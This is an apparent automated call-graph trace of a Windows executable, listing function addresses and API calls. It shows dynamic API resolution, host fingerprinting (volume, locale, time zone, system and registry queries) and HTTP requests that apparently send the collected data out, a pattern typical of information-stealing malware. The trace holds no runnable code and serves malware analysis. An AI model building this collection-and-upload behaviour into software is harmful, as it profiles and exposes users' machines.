14427 bc3fe6 14426->14427 14428 bc45c0 2 API calls 14427->14428 14429 bc3fff 14428->14429 14430 bc45c0 2 API calls 14429->14430 14431 bc4018 14430->14431 14432 bc45c0 2 API calls 14431->14432 14433 bc4031 14432->14433 14434 bc45c0 2 API calls 14433->14434 14435 bc404a 14434->14435 14436 bc45c0 2 API calls 14435->14436 14437 bc4063 14436->14437 14438 bc45c0 2 API calls 14437->14438 14439 bc407c 14438->14439 14440 bc45c0 2 API calls 14439->14440 14441 bc4095 14440->14441 14442 bc45c0 2 API calls 14441->14442 14443 bc40ae 14442->14443 14444 bc45c0 2 API calls 14443->14444 14445 bc40c7 14444->14445 14446 bc45c0 2 API calls 14445->14446 14447 bc40e0 14446->14447 14448 bc45c0 2 API calls 14447->14448 14449 bc40f9 14448->14449 14450 bc45c0 2 API calls 14449->14450 14451 bc4112 14450->14451 14452 bc45c0 2 API calls 14451->14452 14453 bc412b 14452->14453 14454 bc45c0 2 API calls 14453->14454 14455 bc4144 14454->14455 14456 bc45c0 2 API calls 14455->14456 14457 bc415d 14456->14457 14458 bc45c0 2 API calls 14457->14458 14459 bc4176 14458->14459 14460 bc45c0 2 API calls 14459->14460 14461 bc418f 14460->14461 14462 bc45c0 2 API calls 14461->14462 14463 bc41a8 14462->14463 14464 bc45c0 2 API calls 14463->14464 14465 bc41c1 14464->14465 14466 bc45c0 2 API calls 14465->14466 14467 bc41da 14466->14467 14468 bc45c0 2 API calls 14467->14468 14469 bc41f3 14468->14469 14470 bc45c0 2 API calls 14469->14470 14471 bc420c 14470->14471 14472 bc45c0 2 API calls 14471->14472 14473 bc4225 14472->14473 14474 bc45c0 2 API calls 14473->14474 14475 bc423e 14474->14475 14476 bc45c0 2 API calls 14475->14476 14477 bc4257 14476->14477 14478 bc45c0 2 API calls 14477->14478 14479 bc4270 14478->14479 14480 bc45c0 2 API calls 14479->14480 14481 bc4289 14480->14481 14482 bc45c0 2 API calls 14481->14482 14483 bc42a2 14482->14483 14484 bc45c0 2 API calls 14483->14484 14485 bc42bb 14484->14485 14486 bc45c0 2 API calls 14485->14486 14487 bc42d4 14486->14487 14488 bc45c0 2 API calls 14487->14488 14489 bc42ed 14488->14489 14490 bc45c0 2 API calls 14489->14490 14491 bc4306 14490->14491 14492 bc45c0 2 API calls 14491->14492 14493 bc431f 14492->14493 14494 bc45c0 2 API calls 14493->14494 14495 bc4338 14494->14495 14496 bc45c0 2 API calls 14495->14496 14497 bc4351 14496->14497 14498 bc45c0 2 API calls 14497->14498 14499 bc436a 14498->14499 14500 bc45c0 2 API calls 14499->14500 14501 bc4383 14500->14501 14502 bc45c0 2 API calls 14501->14502 14503 bc439c 14502->14503 14504 bc45c0 2 API calls 14503->14504 14505 bc43b5 14504->14505 14506 bc45c0 2 API calls 14505->14506 14507 bc43ce 14506->14507 14508 bc45c0 2 API calls 14507->14508 14509 bc43e7 14508->14509 14510 bc45c0 2 API calls 14509->14510 14511 bc4400 14510->14511 14512 bc45c0 2 API calls 14511->14512 14513 bc4419 14512->14513 14514 bc45c0 2 API calls 14513->14514 14515 bc4432 14514->14515 14516 bc45c0 2 API calls 14515->14516 14517 bc444b 14516->14517 14518 bc45c0 2 API calls 14517->14518 14519 bc4464 14518->14519 14520 bc45c0 2 API calls 14519->14520 14521 bc447d 14520->14521 14522 bc45c0 2 API calls 14521->14522 14523 bc4496 14522->14523 14524 bc45c0 2 API calls 14523->14524 14525 bc44af 14524->14525 14526 bc45c0 2 API calls 14525->14526 14527 bc44c8 14526->14527 14528 bc45c0 2 API calls 14527->14528 14529 bc44e1 14528->14529 14530 bc45c0 2 API calls 14529->14530 14531 bc44fa 14530->14531 14532 bc45c0 2 API calls 14531->14532 14533 bc4513 14532->14533 14534 bc45c0 2 API calls 14533->14534 14535 bc452c 14534->14535 14536 bc45c0 2 API calls 14535->14536 14537 bc4545 14536->14537 14538 bc45c0 2 API calls 14537->14538 14539 bc455e 14538->14539 14540 bc45c0 2 API calls 14539->14540 14541 bc4577 14540->14541 14542 bc45c0 2 API calls 14541->14542 14543 bc4590 14542->14543 14544 bc45c0 2 API calls 14543->14544 14545 bc45a9 14544->14545 14546 bd9c10 14545->14546 14547 bda036 8 API calls 14546->14547 14548 bd9c20 43 API calls 14546->14548 14549 bda0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14547->14549 14550 bda146 14547->14550 14548->14547 14549->14550 14551 bda216 14550->14551 14552 bda153 8 API calls 14550->14552 14553 bda21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14551->14553 14554 bda298 14551->14554 14552->14551 14553->14554 14555 bda2a5 6 API calls 14554->14555 14556 bda337 14554->14556 14555->14556 14557 bda41f 14556->14557 14558 bda344 9 API calls 14556->14558 14559 bda428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14557->14559 14560 bda4a2 14557->14560 14558->14557 14559->14560 14561 bda4dc 14560->14561 14562 bda4ab GetProcAddress GetProcAddress 14560->14562 14563 bda515 14561->14563 14564 bda4e5 GetProcAddress GetProcAddress 14561->14564 14562->14561 14565 bda612 14563->14565 14566 bda522 10 API calls 14563->14566 14564->14563 14567 bda67d 14565->14567 14568 bda61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14565->14568 14566->14565 14569 bda69e 14567->14569 14570 bda686 GetProcAddress 14567->14570 14568->14567 14571 bd5ca3 14569->14571 14572 bda6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14569->14572 14570->14569 14573 bc1590 14571->14573 14572->14571 15694 bc1670 14573->15694 14576 bda7a0 lstrcpy 14577 bc15b5 14576->14577 14578 bda7a0 lstrcpy 14577->14578 14579 bc15c7 14578->14579 14580 bda7a0 lstrcpy 14579->14580 14581 bc15d9 14580->14581 14582 bda7a0 lstrcpy 14581->14582 14583 bc1663 14582->14583 14584 bd5510 14583->14584 14585 bd5521 14584->14585 14586 bda820 2 API calls 14585->14586 14587 bd552e 14586->14587 14588 bda820 2 API calls 14587->14588 14589 bd553b 14588->14589 14590 bda820 2 API calls 14589->14590 14591 bd5548 14590->14591 14592 bda740 lstrcpy 14591->14592 14593 bd5555 14592->14593 14594 bda740 lstrcpy 14593->14594 14595 bd5562 14594->14595 14596 bda740 lstrcpy 14595->14596 14597 bd556f 14596->14597 14598 bda740 lstrcpy 14597->14598 14609 bd557c 14598->14609 14599 bda740 lstrcpy 14599->14609 14600 bd5643 StrCmpCA 14600->14609 14601 bd56a0 StrCmpCA 14602 bd57dc 14601->14602 14601->14609 14603 bda8a0 lstrcpy 14602->14603 14604 bd57e8 14603->14604 14605 bda820 2 API calls 14604->14605 14607 bd57f6 14605->14607 14606 bda820 lstrlen lstrcpy 14606->14609 14610 bda820 2 API calls 14607->14610 14608 bd5856 StrCmpCA 14608->14609 14611 bd5991 14608->14611 14609->14599 14609->14600 14609->14601 14609->14606 14609->14608 14618 bd5a0b StrCmpCA 14609->14618 14619 bd52c0 25 API calls 14609->14619 14623 bda8a0 lstrcpy 14609->14623 14632 bd578a StrCmpCA 14609->14632 14634 bda7a0 lstrcpy 14609->14634 14635 bd593f StrCmpCA 14609->14635 14636 bd51f0 20 API calls 14609->14636 14637 bc1590 lstrcpy 14609->14637 14613 bd5805 14610->14613 14612 bda8a0 lstrcpy 14611->14612 14614 bd599d 14612->14614 14615 bc1670 lstrcpy 14613->14615 14616 bda820 2 API calls 14614->14616 14638 bd5811 14615->14638 14617 bd59ab 14616->14617 14620 bda820 2 API calls 14617->14620 14621 bd5a28 14618->14621 14622 bd5a16 Sleep 14618->14622 14619->14609 14624 bd59ba 14620->14624 14625 bda8a0 lstrcpy 14621->14625 14622->14609 14623->14609 14626 bc1670 lstrcpy 14624->14626 14627 bd5a34 14625->14627 14626->14638 14628 bda820 2 API calls 14627->14628 14629 bd5a43 14628->14629 14630 bda820 2 API calls 14629->14630 14631 bd5a52 14630->14631 14633 bc1670 lstrcpy 14631->14633 14632->14609 14633->14638 14634->14609 14635->14609 14636->14609 14637->14609 14638->13691 14640 bd754c 14639->14640 14641 bd7553 GetVolumeInformationA 14639->14641 14640->14641 14642 bd7591 14641->14642 14643 bd75fc GetProcessHeap RtlAllocateHeap 14642->14643 14644 bd7619 14643->14644 14645 bd7628 wsprintfA 14643->14645 14646 bda740 lstrcpy 14644->14646 14647 bda740 lstrcpy 14645->14647 14648 bd5da7 14646->14648 14647->14648 14648->13712 14650 bda7a0 lstrcpy 14649->14650 14651 bc4899 14650->14651 15703 bc47b0 14651->15703 14653 bc48a5 14654 bda740 lstrcpy 14653->14654 14655 bc48d7 14654->14655 14656 bda740 lstrcpy 14655->14656 14657 bc48e4 14656->14657 14658 bda740 lstrcpy 14657->14658 14659 bc48f1 14658->14659 14660 bda740 lstrcpy 14659->14660 14661 bc48fe 14660->14661 14662 bda740 lstrcpy 14661->14662 14663 bc490b InternetOpenA StrCmpCA 14662->14663 14664 bc4944 14663->14664 14665 bc4ecb InternetCloseHandle 14664->14665 15709 bd8b60 14664->15709 14667 bc4ee8 14665->14667 15724 bc9ac0 CryptStringToBinaryA 14667->15724 14668 bc4963 15717 bda920 14668->15717 14671 bc4976 14672 bda8a0 lstrcpy 14671->14672 14678 bc497f 14672->14678 14674 bda820 2 API calls 14675 bc4f05 14674->14675 14676 bda9b0 4 API calls 14675->14676 14679 bc4f1b 14676->14679 14677 bc4f27 codecvt 14680 bda7a0 lstrcpy 14677->14680 14682 bda9b0 4 API calls 14678->14682 14681 bda8a0 lstrcpy 14679->14681 14693 bc4f57 14680->14693 14681->14677 14683 bc49a9 14682->14683 14684 bda8a0 lstrcpy 14683->14684 14685 bc49b2 14684->14685 14686 bda9b0 4 API calls 14685->14686 14687 bc49d1 14686->14687 14688 bda8a0 lstrcpy 14687->14688 14689 bc49da 14688->14689 14690 bda920 3 API calls 14689->14690 14691 bc49f8 14690->14691 14692 bda8a0 lstrcpy 14691->14692 14694 bc4a01 14692->14694 14693->13715 14695 bda9b0 4 API calls 14694->14695 14696 bc4a20 14695->14696 14697 bda8a0 lstrcpy 14696->14697 14698 bc4a29 14697->14698 14699 bda9b0 4 API calls 14698->14699 14700 bc4a48 14699->14700 14701 bda8a0 lstrcpy 14700->14701 14702 bc4a51 14701->14702 14703 bda9b0 4 API calls 14702->14703 14704 bc4a7d 14703->14704 14705 bda920 3 API calls 14704->14705 14706 bc4a84 14705->14706 14707 bda8a0 lstrcpy 14706->14707 14708 bc4a8d 14707->14708 14709 bc4aa3 InternetConnectA 14708->14709 14709->14665 14710 bc4ad3 HttpOpenRequestA 14709->14710 14712 bc4ebe InternetCloseHandle 14710->14712 14713 bc4b28 14710->14713 14712->14665 14714 bda9b0 4 API calls 14713->14714 14715 bc4b3c 14714->14715 14716 bda8a0 lstrcpy 14715->14716 14717 bc4b45 14716->14717 14718 bda920 3 API calls 14717->14718 14719 bc4b63 14718->14719 14720 bda8a0 lstrcpy 14719->14720 14721 bc4b6c 14720->14721 14722 bda9b0 4 API calls 14721->14722 14723 bc4b8b 14722->14723 14724 bda8a0 lstrcpy 14723->14724 14725 bc4b94 14724->14725 14726 bda9b0 4 API calls 14725->14726 14727 bc4bb5 14726->14727 14728 bda8a0 lstrcpy 14727->14728 14729 bc4bbe 14728->14729 14730 bda9b0 4 API calls 14729->14730 14731 bc4bde 14730->14731 14732 bda8a0 lstrcpy 14731->14732 14733 bc4be7 14732->14733 14734 bda9b0 4 API calls 14733->14734 14735 bc4c06 14734->14735 14736 bda8a0 lstrcpy 14735->14736 14737 bc4c0f 14736->14737 14738 bda920 3 API calls 14737->14738 14739 bc4c2d 14738->14739 14740 bda8a0 lstrcpy 14739->14740 14741 bc4c36 14740->14741 14742 bda9b0 4 API calls 14741->14742 14743 bc4c55 14742->14743 14744 bda8a0 lstrcpy 14743->14744 14745 bc4c5e 14744->14745 14746 bda9b0 4 API calls 14745->14746 14747 bc4c7d 14746->14747 14748 bda8a0 lstrcpy 14747->14748 14749 bc4c86 14748->14749 14750 bda920 3 API calls 14749->14750 14751 bc4ca4 14750->14751 14752 bda8a0 lstrcpy 14751->14752 14753 bc4cad 14752->14753 14754 bda9b0 4 API calls 14753->14754 14755 bc4ccc 14754->14755 14756 bda8a0 lstrcpy 14755->14756 14757 bc4cd5 14756->14757 14758 bda9b0 4 API calls 14757->14758 14759 bc4cf6 14758->14759 14760 bda8a0 lstrcpy 14759->14760 14761 bc4cff 14760->14761 14762 bda9b0 4 API calls 14761->14762 14763 bc4d1f 14762->14763 14764 bda8a0 lstrcpy 14763->14764 14765 bc4d28 14764->14765 14766 bda9b0 4 API calls 14765->14766 14767 bc4d47 14766->14767 14768 bda8a0 lstrcpy 14767->14768 14769 bc4d50 14768->14769 14770 bda920 3 API calls 14769->14770 14771 bc4d6e 14770->14771 14772 bda8a0 lstrcpy 14771->14772 14773 bc4d77 14772->14773 14774 bda740 lstrcpy 14773->14774 14775 bc4d92 14774->14775 14776 bda920 3 API calls 14775->14776 14777 bc4db3 14776->14777 14778 bda920 3 API calls 14777->14778 14779 bc4dba 14778->14779 14780 bda8a0 lstrcpy 14779->14780 14781 bc4dc6 14780->14781 14782 bc4de7 lstrlen 14781->14782 14783 bc4dfa 14782->14783 14784 bc4e03 lstrlen 14783->14784 15723 bdaad0 14784->15723 14786 bc4e13 HttpSendRequestA 14787 bc4e32 InternetReadFile 14786->14787 14788 bc4e67 InternetCloseHandle 14787->14788 14793 bc4e5e 14787->14793 14791 bda800 14788->14791 14790 bda9b0 4 API calls 14790->14793 14791->14712 14792 bda8a0 lstrcpy 14792->14793 14793->14787 14793->14788 14793->14790 14793->14792 15730 bdaad0 14794->15730 14796 bd17c4 StrCmpCA 14797 bd17cf ExitProcess 14796->14797 14808 bd17d7 14796->14808 14798 bd19c2 14798->13717 14799 bd185d StrCmpCA 14799->14808 14800 bd187f StrCmpCA 14800->14808 14801 bd18f1 StrCmpCA 14801->14808 14802 bd1951 StrCmpCA 14802->14808 14803 bd1970 StrCmpCA 14803->14808 14804 bd1913 StrCmpCA 14804->14808 14805 bd1932 StrCmpCA 14805->14808 14806 bd18ad StrCmpCA 14806->14808 14807 bd18cf StrCmpCA 14807->14808 14808->14798 14808->14799 14808->14800 14808->14801 14808->14802 14808->14803 14808->14804 14808->14805 14808->14806 14808->14807 14809 bda820 lstrlen lstrcpy 14808->14809 14809->14808 14811 bda7a0 lstrcpy 14810->14811 14812 bc5979 14811->14812 14813 bc47b0 2 API calls 14812->14813 14814 bc5985 14813->14814 14815 bda740 lstrcpy 14814->14815 14816 bc59ba 14815->14816 14817 bda740 lstrcpy 14816->14817 14818 bc59c7 14817->14818 14819 bda740 lstrcpy 14818->14819 14820 bc59d4 14819->14820 14821 bda740 lstrcpy 14820->14821 14822 bc59e1 14821->14822 14823 bda740 lstrcpy 14822->14823 14824 bc59ee InternetOpenA StrCmpCA 14823->14824 14825 bc5a1d 14824->14825 14826 bc5fc3 InternetCloseHandle 14825->14826 14827 bd8b60 3 API calls 14825->14827 14828 bc5fe0 14826->14828 14829 bc5a3c 14827->14829 14831 bc9ac0 4 API calls 14828->14831 14830 bda920 3 API calls 14829->14830 14832 bc5a4f 14830->14832 14833 bc5fe6 14831->14833 14834 bda8a0 lstrcpy 14832->14834 14835 bda820 2 API calls 14833->14835 14837 bc601f codecvt 14833->14837 14840 bc5a58 14834->14840 14836 bc5ffd 14835->14836 14838 bda9b0 4 API calls 14836->14838 14842 bda7a0 lstrcpy 14837->14842 14839 bc6013 14838->14839 14841 bda8a0 lstrcpy 14839->14841 14843 bda9b0 4 API calls 14840->14843 14841->14837 14851 bc604f 14842->14851 14844 bc5a82 14843->14844 14845 bda8a0 lstrcpy 14844->14845 14846 bc5a8b 14845->14846 14847 bda9b0 4 API calls 14846->14847 14848 bc5aaa 14847->14848 14849 bda8a0 lstrcpy 14848->14849 14850 bc5ab3 14849->14850 14852 bda920 3 API calls 14850->14852 14851->13723 14853 bc5ad1 14852->14853 14854 bda8a0 lstrcpy 14853->14854 14855 bc5ada 14854->14855 14856 bda9b0 4 API calls 14855->14856 14857 bc5af9 14856->14857 14858 bda8a0 lstrcpy 14857->14858 14859 bc5b02 14858->14859 14860 bda9b0 4 API calls 14859->14860 14861 bc5b21 14860->14861 14862 bda8a0 lstrcpy 14861->14862 14863 bc5b2a 14862->14863 14864 bda9b0 4 API calls 14863->14864 14865 bc5b56 14864->14865 14866 bda920 3 API calls 14865->14866 14867 bc5b5d 14866->14867 14868 bda8a0 lstrcpy 14867->14868 14869 bc5b66 14868->14869 14870 bc5b7c InternetConnectA 14869->14870 14870->14826 14871 bc5bac HttpOpenRequestA 14870->14871 14873 bc5c0b 14871->14873 14874 bc5fb6 InternetCloseHandle 14871->14874 14875 bda9b0 4 API calls 14873->14875 14874->14826 14876 bc5c1f 14875->14876 14877 bda8a0 lstrcpy 14876->14877 14878 bc5c28 14877->14878 14879 bda920 3 API calls 14878->14879 14880 bc5c46 14879->14880 14881 bda8a0 lstrcpy 14880->14881 14882 bc5c4f 14881->14882 14883 bda9b0 4 API calls 14882->14883 14884 bc5c6e 14883->14884 14885 bda8a0 lstrcpy 14884->14885 14886 bc5c77 14885->14886 14887 bda9b0 4 API calls 14886->14887 14888 bc5c98 14887->14888 14889 bda8a0 lstrcpy 14888->14889 14890 bc5ca1 14889->14890 14891 bda9b0 4 API calls 14890->14891 14892 bc5cc1 14891->14892 14893 bda8a0 lstrcpy 14892->14893 14894 bc5cca 14893->14894 14895 bda9b0 4 API calls 14894->14895 14896 bc5ce9 14895->14896 14897 bda8a0 lstrcpy 14896->14897 14898 bc5cf2 14897->14898 14899 bda920 3 API calls 14898->14899 14900 bc5d10 14899->14900 14901 bda8a0 lstrcpy 14900->14901 14902 bc5d19 14901->14902 14903 bda9b0 4 API calls 14902->14903 14904 bc5d38 14903->14904 14905 bda8a0 lstrcpy 14904->14905 14906 bc5d41 14905->14906 14907 bda9b0 4 API calls 14906->14907 14908 bc5d60 14907->14908 14909 bda8a0 lstrcpy 14908->14909 14910 bc5d69 14909->14910 14911 bda920 3 API calls 14910->14911 14912 bc5d87 14911->14912 14913 bda8a0 lstrcpy 14912->14913 14914 bc5d90 14913->14914 14915 bda9b0 4 API calls 14914->14915 14916 bc5daf 14915->14916 14917 bda8a0 lstrcpy 14916->14917 14918 bc5db8 14917->14918 14919 bda9b0 4 API calls 14918->14919 14920 bc5dd9 14919->14920 14921 bda8a0 lstrcpy 14920->14921 14922 bc5de2 14921->14922 14923 bda9b0 4 API calls 14922->14923 14924 bc5e02 14923->14924 14925 bda8a0 lstrcpy 14924->14925 14926 bc5e0b 14925->14926 14927 bda9b0 4 API calls 14926->14927 14928 bc5e2a 14927->14928 14929 bda8a0 lstrcpy 14928->14929 14930 bc5e33 14929->14930 14931 bda920 3 API calls 14930->14931 14932 bc5e54 14931->14932 14933 bda8a0 lstrcpy 14932->14933 14934 bc5e5d 14933->14934 14935 bc5e70 lstrlen 14934->14935 15731 bdaad0 14935->15731 14937 bc5e81 lstrlen GetProcessHeap RtlAllocateHeap 15732 bdaad0 14937->15732 14939 bc5eae lstrlen 14940 bc5ebe 14939->14940 14941 bc5ed7 lstrlen 14940->14941 14942 bc5ee7 14941->14942 14943 bc5ef0 lstrlen 14942->14943 14944 bc5f04 14943->14944 14945 bc5f1a lstrlen 14944->14945 15733 bdaad0 14945->15733 14947 bc5f2a HttpSendRequestA 14948 bc5f35 InternetReadFile 14947->14948 14949 bc5f6a InternetCloseHandle 14948->14949 14953 bc5f61 14948->14953 14949->14874 14951 bda9b0 4 API calls 14951->14953 14952 bda8a0 lstrcpy 14952->14953 14953->14948 14953->14949 14953->14951 14953->14952 14956 bd1077 14954->14956 14955 bd1151 14955->13725 14956->14955 14957 bda820 lstrlen lstrcpy 14956->14957 14957->14956 14960 bd0db7 14958->14960 14959 bd0f17 14959->13733 14960->14959 14961 bd0ea4 StrCmpCA 14960->14961 14962 bd0e27 StrCmpCA 14960->14962 14963 bd0e67 StrCmpCA 14960->14963 14964 bda820 lstrlen lstrcpy 14960->14964 14961->14960 14962->14960 14963->14960 14964->14960 14966 bd0f67 14965->14966 14967 bd1044 14966->14967 14968 bd0fb2 StrCmpCA 14966->14968 14969 bda820 lstrlen lstrcpy 14966->14969 14967->13741 14968->14966 14969->14966 14971 bda740 lstrcpy 14970->14971 14972 bd1a26 14971->14972 14973 bda9b0 4 API calls 14972->14973 14974 bd1a37 14973->14974 14975 bda8a0 lstrcpy 14974->14975 14976 bd1a40 14975->14976 14977 bda9b0 4 API calls 14976->14977 14978 bd1a5b 14977->14978 14979 bda8a0 lstrcpy 14978->14979 14980 bd1a64 14979->14980 14981 bda9b0 4 API calls 14980->14981 14982 bd1a7d 14981->14982 14983 bda8a0 lstrcpy 14982->14983 14984 bd1a86 14983->14984 14985 bda9b0 4 API calls 14984->14985 14986 bd1aa1 14985->14986 14987 bda8a0 lstrcpy 14986->14987 14988 bd1aaa 14987->14988 14989 bda9b0 4 API calls 14988->14989 14990 bd1ac3 14989->14990 14991 bda8a0 lstrcpy 14990->14991 14992 bd1acc 14991->14992 14993 bda9b0 4 API calls 14992->14993 14994 bd1ae7 14993->14994 14995 bda8a0 lstrcpy 14994->14995 14996 bd1af0 14995->14996 14997 bda9b0 4 API calls 14996->14997 14998 bd1b09 14997->14998 14999 bda8a0 lstrcpy 14998->14999 15000 bd1b12 14999->15000 15001 bda9b0 4 API calls 15000->15001 15002 bd1b2d 15001->15002 15003 bda8a0 lstrcpy 15002->15003 15004 bd1b36 15003->15004 15005 bda9b0 4 API calls 15004->15005 15006 bd1b4f 15005->15006 15007 bda8a0 lstrcpy 15006->15007 15008 bd1b58 15007->15008 15009 bda9b0 4 API calls 15008->15009 15010 bd1b76 15009->15010 15011 bda8a0 lstrcpy 15010->15011 15012 bd1b7f 15011->15012 15013 bd7500 6 API calls 15012->15013 15014 bd1b96 15013->15014 15015 bda920 3 API calls 15014->15015 15016 bd1ba9 15015->15016 15017 bda8a0 lstrcpy 15016->15017 15018 bd1bb2 15017->15018 15019 bda9b0 4 API calls 15018->15019 15020 bd1bdc 15019->15020 15021 bda8a0 lstrcpy 15020->15021 15022 bd1be5 15021->15022 15023 bda9b0 4 API calls 15022->15023 15024 bd1c05 15023->15024 15025 bda8a0 lstrcpy 15024->15025 15026 bd1c0e 15025->15026 15734 bd7690 GetProcessHeap RtlAllocateHeap 15026->15734 15029 bda9b0 4 API calls 15030 bd1c2e 15029->15030 15031 bda8a0 lstrcpy 15030->15031 15032 bd1c37 15031->15032 15033 bda9b0 4 API calls 15032->15033 15034 bd1c56 15033->15034 15035 bda8a0 lstrcpy 15034->15035 15036 bd1c5f 15035->15036 15037 bda9b0 4 API calls 15036->15037 15038 bd1c80 15037->15038 15039 bda8a0 lstrcpy 15038->15039 15040 bd1c89 15039->15040 15741 bd77c0 GetCurrentProcess IsWow64Process 15040->15741 15043 bda9b0 4 API calls 15044 bd1ca9 15043->15044 15045 bda8a0 lstrcpy 15044->15045 15046 bd1cb2 15045->15046 15047 bda9b0 4 API calls 15046->15047 15048 bd1cd1 15047->15048 15049 bda8a0 lstrcpy 15048->15049 15050 bd1cda 15049->15050 15051 bda9b0 4 API calls 15050->15051 15052 bd1cfb 15051->15052 15053 bda8a0 lstrcpy 15052->15053 15054 bd1d04 15053->15054 15055 bd7850 3 API calls 15054->15055 15056 bd1d14 15055->15056 15057 bda9b0 4 API calls 15056->15057 15058 bd1d24 15057->15058 15059 bda8a0 lstrcpy 15058->15059 15060 bd1d2d 15059->15060 15061 bda9b0 4 API calls 15060->15061 15062 bd1d4c 15061->15062 15063 bda8a0 lstrcpy 15062->15063 15064 bd1d55 15063->15064 15065 bda9b0 4 API calls 15064->15065 15066 bd1d75 15065->15066 15067 bda8a0 lstrcpy 15066->15067 15068 bd1d7e 15067->15068 15069 bd78e0 3 API calls 15068->15069 15070 bd1d8e 15069->15070 15071 bda9b0 4 API calls 15070->15071 15072 bd1d9e 15071->15072 15073 bda8a0 lstrcpy 15072->15073 15074 bd1da7 15073->15074 15075 bda9b0 4 API calls 15074->15075 15076 bd1dc6 15075->15076 15077 bda8a0 lstrcpy 15076->15077 15078 bd1dcf 15077->15078 15079 bda9b0 4 API calls 15078->15079 15080 bd1df0 15079->15080 15081 bda8a0 lstrcpy 15080->15081 15082 bd1df9 15081->15082 15743 bd7980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15082->15743 15085 bda9b0 4 API calls 15086 bd1e19 15085->15086 15087 bda8a0 lstrcpy 15086->15087 15088 bd1e22 15087->15088 15089 bda9b0 4 API calls 15088->15089 15090 bd1e41 15089->15090 15091 bda8a0 lstrcpy 15090->15091 15092 bd1e4a 15091->15092 15093 bda9b0 4 API calls 15092->15093 15094 bd1e6b 15093->15094 15095 bda8a0 lstrcpy 15094->15095 15096 bd1e74 15095->15096 15745 bd7a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15096->15745 15099 bda9b0 4 API calls 15100 bd1e94 15099->15100 15101 bda8a0 lstrcpy 15100->15101 15102 bd1e9d 15101->15102 15103 bda9b0 4 API calls 15102->15103 15104 bd1ebc 15103->15104 15105 bda8a0 lstrcpy 15104->15105 15106 bd1ec5 15105->15106 15107 bda9b0 4 API calls 15106->15107 15108 bd1ee5 15107->15108 15109 bda8a0 lstrcpy 15108->15109 15110 bd1eee 15109->15110 15748 bd7b00 GetUserDefaultLocaleName 15110->15748 15113 bda9b0 4 API calls 15114 bd1f0e 15113->15114 15115 bda8a0 lstrcpy 15114->15115 15116 bd1f17 15115->15116 15117 bda9b0 4 API calls 15116->15117 15118 bd1f36 15117->15118 15119 bda8a0 lstrcpy 15118->15119 15120 bd1f3f 15119->15120 15121 bda9b0 4 API calls 15120->15121 15122 bd1f60 15121->15122 15123 bda8a0 lstrcpy 15122->15123 15124 bd1f69 15123->15124 15752 bd7b90 15124->15752 15126 bd1f80 15127 bda920 3 API calls 15126->15127 15128 bd1f93 15127->15128 15129 bda8a0 lstrcpy 15128->15129 15130 bd1f9c 15129->15130 15131 bda9b0 4 API calls 15130->15131 15132 bd1fc6 15131->15132 15133 bda8a0 lstrcpy 15132->15133 15134 bd1fcf 15133->15134 15135 bda9b0 4 API calls 15134->15135 15136 bd1fef 15135->15136 15137 bda8a0 lstrcpy 15136->15137 15138 bd1ff8 15137->15138 15764 bd7d80 GetSystemPowerStatus 15138->15764 15141 bda9b0 4 API calls 15142 bd2018 15141->15142 15143 bda8a0 lstrcpy 15142->15143 15144 bd2021 15143->15144 15145 bda9b0 4 API calls 15144->15145 15146 bd2040 15145->15146 15147 bda8a0 lstrcpy 15146->15147 15148 bd2049 15147->15148 15149 bda9b0 4 API calls 15148->15149 15150 bd206a 15149->15150 15151 bda8a0 lstrcpy 15150->15151 15152 bd2073 15151->15152 15153 bd207e GetCurrentProcessId 15152->15153 15766 bd9470 OpenProcess 15153->15766 15156 bda920 3 API calls 15157 bd20a4 15156->15157 15158 bda8a0 lstrcpy 15157->15158 15159 bd20ad 15158->15159 15160 bda9b0 4 API calls 15159->15160 15161 bd20d7 15160->15161 15162 bda8a0 lstrcpy 15161->15162 15163 bd20e0 15162->15163 15164 bda9b0 4 API calls 15163->15164 15165 bd2100 15164->15165 15166 bda8a0 lstrcpy 15165->15166 15167 bd2109 15166->15167 15771 bd7e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15167->15771 15170 bda9b0 4 API calls 15171 bd2129 15170->15171 15172 bda8a0 lstrcpy 15171->15172 15173 bd2132 15172->15173 15174 bda9b0 4 API calls 15173->15174 15175 bd2151 15174->15175 15176 bda8a0 lstrcpy 15175->15176 15177 bd215a 15176->15177 15178 bda9b0 4 API calls 15177->15178 15179 bd217b 15178->15179 15180 bda8a0 lstrcpy 15179->15180 15181 bd2184 15180->15181 15775 bd7f60 15181->15775 15184 bda9b0 4 API calls 15185 bd21a4 15184->15185 15186 bda8a0 lstrcpy 15185->15186 15187 bd21ad 15186->15187 15188 bda9b0 4 API calls 15187->15188 15189 bd21cc 15188->15189 15190 bda8a0 lstrcpy 15189->15190 15191 bd21d5 15190->15191 15192 bda9b0 4 API calls 15191->15192 15193 bd21f6 15192->15193 15194 bda8a0 lstrcpy 15193->15194 15195 bd21ff 15194->15195 15788 bd7ed0 GetSystemInfo wsprintfA 15195->15788 15198 bda9b0 4 API calls 15199 bd221f 15198->15199 15200 bda8a0 lstrcpy 15199->15200 15201 bd2228 15200->15201 15202 bda9b0 4 API calls 15201->15202 15203 bd2247 15202->15203 15204 bda8a0 lstrcpy 15203->15204 15205 bd2250 15204->15205 15206 bda9b0 4 API calls 15205->15206 15207 bd2270 15206->15207 15208 bda8a0 lstrcpy 15207->15208 15209 bd2279 15208->15209 15790 bd8100 GetProcessHeap RtlAllocateHeap 15209->15790 15212 bda9b0 4 API calls 15213 bd2299 15212->15213 15214 bda8a0 lstrcpy 15213->15214 15215 bd22a2 15214->15215 15216 bda9b0 4 API calls 15215->15216 15217 bd22c1 15216->15217 15218 bda8a0 lstrcpy 15217->15218 15219 bd22ca 15218->15219 15220 bda9b0 4 API calls 15219->15220 15221 bd22eb 15220->15221 15222 bda8a0 lstrcpy 15221->15222 15223 bd22f4 15222->15223 15796 bd87c0 15223->15796 15226 bda920 3 API calls 15227 bd231e 15226->15227 15228 bda8a0 lstrcpy 15227->15228 15229 bd2327 15228->15229 15230 bda9b0 4 API calls 15229->15230 15231 bd2351 15230->15231 15232 bda8a0 lstrcpy 15231->15232 15233 bd235a 15232->15233 15234 bda9b0 4 API calls 15233->15234 15235 bd237a 15234->15235 15236 bda8a0 lstrcpy 15235->15236 15237 bd2383 15236->15237 15238 bda9b0 4 API calls 15237->15238 15239 bd23a2 15238->15239 